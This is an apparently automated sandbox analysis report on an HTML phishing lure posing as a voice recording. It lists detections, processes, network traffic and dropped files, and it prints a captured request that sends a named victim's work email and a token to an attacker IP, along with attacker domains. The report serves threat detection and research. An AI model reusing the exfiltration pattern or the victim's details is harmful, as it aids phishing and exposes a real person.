Windows Analysis Report
Tanveer Sethi_Voice-REC-481680954386772.html

Overview

General Information

Sample name:Tanveer Sethi_Voice-REC-481680954386772.html
Analysis ID:1625443
MD5:d44cce885742160c3ce552280eed56d2
SHA1:66609d4d0e85566900a5265bf7c76bbc656c1ff1
SHA256:0f7f173e6f70c4958b783074205e8698290bfdd7f3c2811f3df208ed099b92ee
Infos:

Detection

HTMLPhisher
Score:72
Range:0 - 100
Confidence:100%

Signatures

Yara detected HtmlPhish76
AI detected suspicious Javascript
Detected javascript redirector / loader
HTML Script injector detected
HTML document with suspicious name
HTML document with suspicious title
Suspicious Javascript code found in HTML file
Detected non-DNS traffic on DNS port
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6636 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Downloads\eYjhNNmIwC\Tanveer Sethi_Voice-REC-481680954386772.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6404 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2024,i,8594538992360204343,16991340806916787047,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
Source | Rule | Description | Author | Strings
1.1.pages.csv | JoeSecurity_HtmlPhish_76 | Yara detected HtmlPhish_76 | Joe Security |
    No Sigma rule has matched
    No Suricata rule has matched



    Phishing

    Source: Yara match | File source: 1.1.pages.csv, type: HTML
    Source: 0.0.i.script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Downloads/eYjhNNmIwC/Tanveer... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. The script decodes and executes a large block of encoded data, which is a strong indicator of malicious intent. Additionally, the script appears to be sending data to an unknown domain, which raises concerns about potential data exfiltration. Overall, the combination of these high-risk factors suggests that this script is likely malicious and should be treated with caution.
    Source: Tanveer Sethi_Voice-REC-481680954386772.html | HTTP Parser: Low number of body elements: 2
    Source: file:///C:/Users/user/Downloads/eYjhNNmIwC/Tanveer%20Sethi_Voice-REC-481680954386772.html | HTTP Parser: New script tag found
    Source: file:///C:/Users/user/Downloads/eYjhNNmIwC/Tanveer%20Sethi_Voice-REC-481680954386772.html | HTTP Parser: New script, src: https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js
    Source: file:///C:/Users/user/Downloads/eYjhNNmIwC/Tanveer%20Sethi_Voice-REC-481680954386772.html | Tab title: Tanveer Sethi_Voice-REC-481680954386772.html
    Source: Tanveer Sethi_Voice-REC-481680954386772.html | HTTP Parser: document.write
    Source: Tanveer Sethi_Voice-REC-481680954386772.html | HTTP Parser: No favicon
    Source: global traffic | TCP traffic: 192.168.2.16:52003 -> 1.1.1.1:53
    Source: global traffic | TCP traffic: 192.168.2.16:61622 -> 162.159.36.2:53
    Source: global traffic | TCP traffic: 192.168.2.16:50996 -> 1.1.1.1:53
    Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: global traffic | HTTP traffic detected:
        HTTP/1.1 200 OK
        Date: Thu, 27 Feb 2025 07:56:06 GMT
        Server: Apache/2.4.52 (Ubuntu)
        Access-Control-Allow-Origin: *
        Access-Control-Allow-Methods: POST, GET, OPTIONS
        Access-Control-Allow-Headers: Content-Type
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 4847
        Keep-Alive: timeout=5, max=99
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
    Source: global traffic | HTTP traffic detected:
        HTTP/1.1 200 OK
        Date: Thu, 27 Feb 2025 07:57:22 GMT
        Server: Apache/2.4.52 (Ubuntu)
        Access-Control-Allow-Origin: *
        Access-Control-Allow-Methods: POST, GET, OPTIONS
        Access-Control-Allow-Headers: Content-Type
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 4847
        Keep-Alive: timeout=5, max=99
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
    Source: global traffic | HTTP traffic detected:
        GET /ajax/libs/jquery/3.6.0/jquery.min.js HTTP/1.1
        Host: cdnjs.cloudflare.com
        Connection: keep-alive
        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
        sec-ch-ua-mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
        sec-ch-ua-platform: "Windows"
        Accept: */*
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: no-cors
        Sec-Fetch-Dest: script
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic | HTTP traffic detected:
        GET /ajax/libs/jquery/3.6.0/jquery.min.js HTTP/1.1
        Host: cdnjs.cloudflare.com
        Connection: keep-alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Accept: */*
        Sec-Fetch-Site: none
        Sec-Fetch-Mode: cors
        Sec-Fetch-Dest: empty
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic | HTTP traffic detected:
        GET / HTTP/1.1
        Host: 176.65.142.110
        Connection: keep-alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Accept: */*
        Accept-Encoding: gzip, deflate
        Accept-Language: en-US,en;q=0.9
    Source: global traffic | DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
    Source: global traffic | DNS traffic detected: DNS query: www.google.com
    Source: global traffic | DNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global traffic | DNS traffic detected: DNS query: 5ruan6zklymxxoj1o8ciaecoiosprkgzbc.org
    Source: global traffic | DNS traffic detected: DNS query: nogasikolen48548838384assqertyuinten.org
    Source: unknown | HTTP traffic detected:
        POST / HTTP/1.1
        Host: 176.65.142.110
        Connection: keep-alive
        Content-Length: 86
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Content-Type: application/json
        Accept: */*
        Origin: null
        Accept-Encoding: gzip, deflate
        Accept-Language: en-US,en;q=0.9
        Data Raw: 7b 22 70 61 72 61 6d 65 74 65 72 22 3a 22 74 61 6e 76 65 65 72 2e 73 65 74 68 69 40 6b 6f 74 61 6b 2e 63 6f 6d 22 2c 22 74 6f 6b 65 6e 22 3a 22 39 66 61 38 61 35 32 64 2d 35 30 31 30 2d 34 64 38 66 2d 61 36 31 33 2d 37 63 30 33 38 64 62 66 63 62 37 62 22 7d
        Data Ascii: {"parameter":"tanveer.sethi@kotak.com","token":"9fa8a52d-5010-4d8f-a613-7c038dbfcb7b"}
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 51177
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 51013
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 51178
    Source: unknown | Network traffic detected: HTTP traffic on port 51025 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 51025
    Source: unknown | Network traffic detected: HTTP traffic on port 51173 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 51177 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 51178 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 51052
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 51173
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 51031
    Source: unknown | Network traffic detected: HTTP traffic on port 51052 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 51031 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 51013 -> 443

    System Summary

    Source: Name includes: Tanveer Sethi_Voice-REC-481680954386772.html | Initial sample: voice-rec
    Source: classification engine | Classification label: mal72.phis.winHTML@13/8@9/92
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Downloads\eYjhNNmIwC\Tanveer Sethi_Voice-REC-481680954386772.html
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2024,i,8594538992360204343,16991340806916787047,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
    MITRE ATT&CK Matrix (a leading number is the count of matched signatures for that technique; entries without a number had no matching signature)
    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
    Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron
    Persistence: 1 Browser Extensions; 1 Registry Run Keys / Startup Folder; Logon Script (Windows); Login Hook
    Privilege Escalation: 1 Process Injection; 1 Registry Run Keys / Startup Folder; Logon Script (Windows); Login Hook
    Defense Evasion: 1 Masquerading; 1 Process Injection; Obfuscated Files or Information; Binary Padding
    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
    Discovery: System Service Discovery; Application Window Discovery; Query Registry; System Network Configuration Discovery
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
    Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
    Command and Control: 1 Encrypted Channel; 4 Non-Application Layer Protocol; 5 Application Layer Protocol; 2 Ingress Tool Transfer
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication
    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction

    Source | Detection | Scanner | Label
    Tanveer Sethi_Voice-REC-481680954386772.html | 2% | Virustotal |
    No Antivirus matches
    Source | Detection | Scanner | Label
    file:///C:/Users/user/Downloads/eYjhNNmIwC/Tanveer%20Sethi_Voice-REC-481680954386772.html | 0% | Avira URL Cloud | safe
    http://176.65.142.110/ | 0% | Avira URL Cloud | safe
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    nogasikolen48548838384assqertyuinten.org | 185.93.89.212 | true | false | | unknown
    cdnjs.cloudflare.com | 104.17.25.14 | true | false | | high
    5ruan6zklymxxoj1o8ciaecoiosprkgzbc.org | 176.65.142.116 | true | false | | unknown
    www.google.com | 142.250.181.228 | true | false | | high
    171.39.242.20.in-addr.arpa | unknown | unknown | false | | high
    Name | Malicious | Antivirus Detection | Reputation
    http://176.65.142.110/ | false | Avira URL Cloud: safe | unknown
    https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js | false | | high
    file:///C:/Users/user/Downloads/eYjhNNmIwC/Tanveer%20Sethi_Voice-REC-481680954386772.html | true | Avira URL Cloud: safe | unknown
    IP | Domain | Country | ASN | ASN Name | Malicious
    142.250.186.46 | unknown | United States | 15169 | GOOGLEUS | false
    142.250.186.78 | unknown | United States | 15169 | GOOGLEUS | false
    185.93.89.212 | nogasikolen48548838384assqertyuinten.org | United Kingdom | 200861 | TS-EMEA-ASNGB | false
    176.65.142.116 | 5ruan6zklymxxoj1o8ciaecoiosprkgzbc.org | Germany | 8649 | WEBTRAFFICDE | false
    176.65.142.110 | unknown | Germany | 8649 | WEBTRAFFICDE | false
    142.250.185.227 | unknown | United States | 15169 | GOOGLEUS | false
    142.251.173.84 | unknown | United States | 15169 | GOOGLEUS | false
    142.251.40.142 | unknown | United States | 15169 | GOOGLEUS | false
    239.255.255.250 | unknown | Reserved | unknown | unknown | false
    142.250.181.228 | www.google.com | United States | 15169 | GOOGLEUS | false
    142.250.186.131 | unknown | United States | 15169 | GOOGLEUS | false
    104.17.25.14 | cdnjs.cloudflare.com | United States | 13335 | CLOUDFLARENETUS | false
    Private IP: 192.168.2.16
                Joe Sandbox version:42.0.0 Malachite
                Analysis ID:1625443
                Start date and time:2025-02-27 08:54:58 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:12
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • EGA enabled
                Analysis Mode:stream
                Analysis stop reason:Timeout
                Sample name:Tanveer Sethi_Voice-REC-481680954386772.html
                Detection:MAL
                Classification:mal72.phis.winHTML@13/8@9/92
                Cookbook Comments:
                • Found application associated with file extension: .html
                • Exclude process from analysis (whitelisted): svchost.exe
                • Excluded IPs from analysis (whitelisted): 2.16.185.191, 4.245.163.56, 13.107.253.72
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes were analyzed, report is missing behavior information
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: 5ruan6zklymxxoj1o8ciaecoiosprkgzbc.org
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Feb 27 06:56:01 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2673
                Entropy (8bit):3.9851555729528525
                Encrypted:false
                SSDEEP:
                MD5:BE5D399EFFA22DB938D18E9C0A2F319C
                SHA1:AA36D022DD3FA5229AFB6D0571605BE0F3D88E9F
                SHA-256:6F0F34BA73534B7C8BA4536BEE7A8D882CEE11FAC2A1F90F06C660DB94F39DA6
                SHA-512:2782E2D8384AE1A205B4AED0BE62D2000BE543600019452C11A410D49EFC11DEDFF629776EBBB665A2FE33E6F63D5CF50B0C325D1ED810809D8469C6249EFD0C
                Malicious:false
                Reputation:unknown
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Feb 27 06:56:01 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2675
                Entropy (8bit):3.9965445874006345
                Encrypted:false
                SSDEEP:
                MD5:CEF06484B7E6AC9646CD05F33FE98F49
                SHA1:3CF2AD7A7D0C810025607F646A084B28C46A582F
                SHA-256:965479095E251FD3207DE9EB1D881DB9E0FAB05BD72CAC5B698A63B182B62C0C
                SHA-512:D0E3467F71711878AA77F2E6EC72C59A6FDB8788BE039A45D66F72AD64CA9BEEC985D71EE745C2F5C5D4E86C36FA129C4B434549CD1EA675C4B29FA89A0A3D36
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,....1.o....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I[Z.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V[Z.?....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V[Z.?....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V[Z.?..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V[Z.?...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........PN.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2689
                Entropy (8bit):4.006361392819798
                Encrypted:false
                SSDEEP:
                MD5:D0EF5598D88E0365F568936B9F4F071F
                SHA1:9A79B6DC2F6A8DEF9D90760A423FE2287A368E4A
                SHA-256:733B5166D41691A41C9211A9D69FC4DDDBF593D3C702AA79F919D0D3CE72CD61
                SHA-512:40EFCBB1A3CF3AFD06DE144485F761E3FEFA53AE925D6AC625BB7648EDAD4683DF1C5D0F1B6A17C44F2ABD1C09944BDCC311E14E309C9DA3AEC7E30A480C76FE
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I[Z.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V[Z.?....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V[Z.?....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V[Z.?..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........PN.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Feb 27 06:56:01 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2677
                Entropy (8bit):3.9954724520733933
                Encrypted:false
                SSDEEP:
                MD5:4830067675EFAF36893DF9101552B7DB
                SHA1:7818E7FD9386DF597D2867532A5A6679A67BC056
                SHA-256:9B255E8478B28658E793A224DE1C455B410B842662462D96059F92AB7D526E91
                SHA-512:F58DA69630C604B919D670F4FE9ED11BF7E0053BCA990E6CAC6D2FBF99EA23AD83620B488C977CDF96DD9EF17C961446BFBA72AD576610D9F6CC77C6D01F27A8
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,....#-h....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I[Z.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V[Z.?....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V[Z.?....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V[Z.?..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V[Z.?...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........PN.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Feb 27 06:56:01 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2677
                Entropy (8bit):3.984416823497049
                Encrypted:false
                SSDEEP:
                MD5:0225951542CCFA5A69368D7001A69710
                SHA1:A532C3C42E363FFCEB1831018997AB8960DA9BDA
                SHA-256:D02AD759A74077C1DE6EE1494955E459F20D63583F8F782C0FBBDECA592D66B9
                SHA-512:330E82CBB0B7930E3E985DF31F8546280081DA81D8FEAB3A6A058FDEDC63767D796948929C2D4AA376C95DC9165986AA19D045C884DCC2FA1C79EE739204A90B
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,....c.w....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I[Z.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V[Z.?....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V[Z.?....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V[Z.?..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V[Z.?...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........PN.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Feb 27 06:56:01 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2679
                Entropy (8bit):3.995073233864402
                Encrypted:false
                SSDEEP:
                MD5:E3100A0CBF8A36EB29EEBDE6598197E5
                SHA1:56F09925C79633F8DF6356E74155EA963053A1D8
                SHA-256:D13E2464F9AED52EB3BE841888348FCD01C1614841BA86A14647645BC27C4937
                SHA-512:D5D53B490DF01216EDFC26352FDD0406CB10C3E52289965134B98CD5C568E6E59C50AA3F9F328BD57606C85024C00CB771242EE87E503362754B3C86B44E3DE7
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,....yNX....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I[Z.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V[Z.?....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V[Z.?....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V[Z.?..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V[Z.?...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........PN.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with very long lines (65447)
                Category:dropped
                Size (bytes):89501
                Entropy (8bit):5.289893677458563
                Encrypted:false
                SSDEEP:
                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                Malicious:false
                Reputation:unknown
                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):21
                Entropy (8bit):3.4273334938982654
                Encrypted:false
                SSDEEP:
                MD5:B93F7F189C790DF6BA03B02CE34992C6
                SHA1:FAE19625E4770FC922B28949B80E5C245CAD3A78
                SHA-256:3561C489D0B2FF97C747C10BB39D826D4E69C62C7E13BF423492735221298843
                SHA-512:089711C4E21F2DF6BC5DC6E2BC13974A0F2D1AF608A2175C25C049A9E15AAA2BBDCD2DD6A8DBA8BBB375F7DAFFB0C9D9334486546B6419DCC5EE5FD4983261DD
                Malicious:false
                Reputation:unknown
                Preview:Site is coming soon!!
